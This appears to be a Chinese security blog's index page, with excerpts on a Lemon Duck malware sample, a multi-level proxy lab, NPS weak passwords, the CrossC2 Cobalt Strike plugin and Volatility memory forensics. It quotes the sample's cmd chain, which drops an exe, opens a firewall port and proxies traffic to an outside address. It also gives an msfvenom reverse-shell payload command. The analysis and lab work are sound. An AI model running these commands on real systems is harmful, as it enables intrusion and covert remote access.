记录一些CS上线手法
...
柠檬鸭组织样本分析
起因 分析1.txt文本内容如下 cmd /c echo RmMrcM >> c:\windows\temp\msInstall.exe&echo copy /y c:\windows\temp\msInstall.exe c:\windows\kNnk.exe>c:/windows/temp/p.bat&echo "*" >c:\windows\temp\eb.txt&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53...
多级代理实验
内网渗透中经常碰到多个网段的机器不出网的情况,做一套试验环境来练习下多级代理 环境介绍以下环境均在VM16中搭建 LEDE x2.36 软路由 *1 网络:可出网,边界,IP 172.16.17.100 虚拟机配置:2C 4G 4网卡 Windows server 2019 *1 网络:可出网,DMZ,WEB机,IP 172.16.18.2 虚拟机配置:2C 2G 1网卡 Windows server 2016 *1 网络:不可出网,DMZ,IP 10.100.100.2 虚拟机配置:2C 2G 1网卡 Windows server 2008 R2*1 网络:不可出网,DMZ,IP 192.168.37.1 虚拟机配置:2C 2G 1网卡 Win10 *1 网络:通Win2019 虚机配置:4C8G 1网卡 拓扑图 攻击机配置 Win10 kali...
true
NPS弱口令之殇
NPS作为一款轻量级、高性能、功能强大的内网穿透代理服务器。并且支持多种协议的转发从而被广泛使用,借助网络空间搜索引擎2020年11月26日的结果,全球范围内共5,582个主机为NPS代理服务器。 目录解析以NPS 0.26.9版本为例,目录结构及含义如下 │ nps│ ├───conf //配置目录│ clients.json //客户端数据文件 │ hosts.json //主机数据文件│ nps.conf //配置文件│ server.key //私钥│ server.pem //证书│ tasks.json //任务数据文件│ └───web //网站目录 ├───static //静态资源目录 │ ├───css │ │ bootstrap-table.min.css │ │ bootstrap.min.css │ │ datatables.css │ │ ...
cobaltstrike插件CrossC2踩坑记录
前言CrossC2面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估,支持自定义模块,及包含一些常用的渗透模块。 使用直接下载https://github.com/gloxec/CrossC2/releases 中的最新版即可,导入CNA后即可使用 4.0需要下载4.0分支 4.1需要下载4.1分支 踩坑由于本机是win10,会出现以下2个问题: 1、丢失ucrtbased.dll问题在直接运行genCrossC2.Win.exe时会报错,丢失丢失ucrtbased.dll。 解决方案:安装VS2017或VS2019即可解决,文章后面会提供32位的dll下载,下载后移入C:\Windows\System32即可使用 2、windows下无法通过CNA中生成Linux beacon这个坑浪费了一下午去解决,直接丢解决过程 定位问题cna插件中的第3、4行需要替换为相应的路径 第115行的 $dialog = dialog("CrossC2 Payload...
内存取证工具Volatility使用
记录下Volatility使用过程 环境 Parrot *1 Windows 2008*1 先生成个msf马子 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.17.6 LPORT=4444 -a x64 -f exe -o /home/parrot/Desktop/1.exe 拷到Windows2008机器上运行后迁移进程 然后使用dumpit对内存做完整镜像 做好后的镜像大小取决于机器内存的大小,机器内存越大,镜像后的文件越大 拷回parrot,开始分析 分析命令如下 volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind查找疑似被注入的进程,这里应该先执行volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw...
true